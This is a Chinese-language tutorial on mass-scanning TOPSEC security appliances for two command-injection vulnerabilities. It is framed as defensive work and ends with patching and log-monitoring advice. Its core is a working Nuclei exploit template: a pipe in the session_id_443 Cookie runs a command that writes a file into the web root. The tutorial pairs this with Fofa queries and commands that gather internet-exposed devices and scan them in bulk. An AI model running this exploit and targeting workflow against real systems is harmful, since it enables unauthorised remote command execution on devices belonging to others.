手把手教你用Nuclei批量检测天融信TOPSEC命令执行漏洞(附POC)
天融信TOPSEC漏洞自动化检测实战:从POC到Nuclei模板的完整工作流
在网络安全领域,效率往往决定着防御的成败。当一个新的漏洞被披露时,安全团队需要在攻击者大规模利用之前快速定位并修复受影响资产。传统的手动验证方式在面对成千上万的IP地址时显得力不从心,这正是自动化工具大显身手的舞台。
1. 理解漏洞本质与检测原理
天融信TOPSEC设备的两处命令执行漏洞都源于对用户输入的不当处理。第一个漏洞出现在/cgi/maincgi.cgi接口,攻击者可以通过精心构造的Cookie值注入系统命令;第二个漏洞则存在于/view/IPV6/naborTable/static_convert.php文件中,通过blocks[0]参数实现命令注入。
漏洞特征对比表:
| 特征项 | 漏洞1(maincgi.cgi) | 漏洞2(static_convert.php) |
|---|---|---|
| 触发路径 | /cgi/maincgi.cgi | /view/IPV6/naborTable/static_convert.php |
| 注入点 | Cookie头中的session_id_443 | blocks[0]参数 |
| 命令分隔符 | 管道符(` | `) |
| 典型利用方式 | 写入web目录文件 | 写入web目录文件 |
| 影响版本 | 特定版本TOPSEC设备 | 上网行为管理系统 |
理解这些技术细节对编写有效的检测模板至关重要。自动化检测的核心思路是:
- 发送包含测试命令的特定请求
- 验证命令是否被执行(通常通过检查文件是否被创建或内容是否正确)
- 清理测试痕迹(理想情况下)
2. 构建Nuclei检测模板
Nuclei作为一款快速、可定制的漏洞扫描器,其强大之处在于模板化的检测方式。下面我们针对第一个漏洞构建完整的检测模板。
id: topsec-maincgi-cookie-rce info: name: Topsec maincgi.cgi Cookie RCE author: security-researcher severity: critical description: | 天融信TOPSEC设备maincgi.cgi接口存在通过Cookie的命令注入漏洞, 可导致远程命令执行。 variables: rand_file: "{{to_lower(rand_text_alpha(8))}}" rand_content: "{{to_lower(rand_text_alpha(12))}}" requests: - raw: - | GET /cgi/maincgi.cgi?Url=test HTTP/1.1 Host: {{Hostname}} Cookie: session_id_443=1|echo '{{rand_content}}' > /www/htdocs/site/image/{{rand_file}}.txt; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 - | GET /site/image/{{rand_file}}.txt HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 matchers: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{rand_content}}')"模板关键元素解析:
变量定义:
rand_file和rand_content使用随机字符串确保每次检测唯一性to_lower函数确保生成的内容兼容不同系统环境
请求链设计:
- 第一个请求尝试注入命令并创建文件
- 第二个请求验证文件是否成功创建且内容匹配
匹配器逻辑:
- 检查两个请求都返回200状态码
- 验证文件内容包含我们注入的随机字符串
注意:实际环境中应考虑添加清理步骤删除测试文件,但需注意这可能在多线程扫描时导致竞争条件。
3. 资产发现与目标筛选
有了检测模板后,下一步是高效定位潜在易受攻击的目标。Fofa等网络空间测绘引擎是理想的选择。
推荐的Fofa搜索语法:
title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"对于第二个漏洞,可以使用:
app="天融信-上网行为管理系统"资产收集最佳实践:
- 使用
-limit参数控制结果数量,避免过量请求 - 考虑使用
-fields参数只获取必要字段(如ip,port) - 对结果进行去重处理(如过滤CDN IP)
- 根据组织需求添加地理位置等过滤条件
# 示例:使用fofa-cli获取目标列表 fofa-cli --query 'title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"' --fields ip,port --limit 1000 > targets.txt4. 自动化扫描工作流整合
将资产收集与漏洞检测结合,形成完整的自动化工作流:
资产发现阶段:
- 使用Fofa API或客户端获取目标列表
- 对结果进行初步过滤和整理
扫描配置阶段:
- 准备Nuclei模板
- 配置并发数、超时等参数
- 设置结果输出格式
执行扫描:
nuclei -l targets.txt -t topsec-rce.yaml -o results.json -rate-limit 50结果分析:
- 使用jq等工具处理JSON结果
- 统计受影响资产数量
- 按严重程度分类结果
性能优化技巧:
- 根据网络条件调整
-rate-limit参数 - 使用
-bulk-size参数优化大目标列表处理 - 考虑分布式扫描架构应对超大规模资产
5. 防御建议与修复方案
对于使用天融信TOPSEC产品的组织,建议采取以下措施:
立即缓解措施:
- 检查设备版本并应用最新补丁
- 临时禁用受影响接口(如通过WAF规则)
- 监控相关路径的异常访问日志
长期加固方案:
- 实施网络分段,限制管理接口访问
- 建立漏洞预警与补丁管理流程
- 定期进行安全配置审计
日志监控关键指标:
- 对
maincgi.cgi和static_convert.php的异常访问 - 包含管道符等特殊字符的Cookie值
- Web目录下异常文件创建行为
在实际企业环境中,我们曾遇到过因未及时更新设备固件导致的大规模入侵事件。攻击者利用类似的命令注入漏洞建立了持久化后门,最终造成了严重的数据泄露。这件事给我们的教训是:自动化漏洞检测不是可选项,而是现代安全运维的必要组成部分。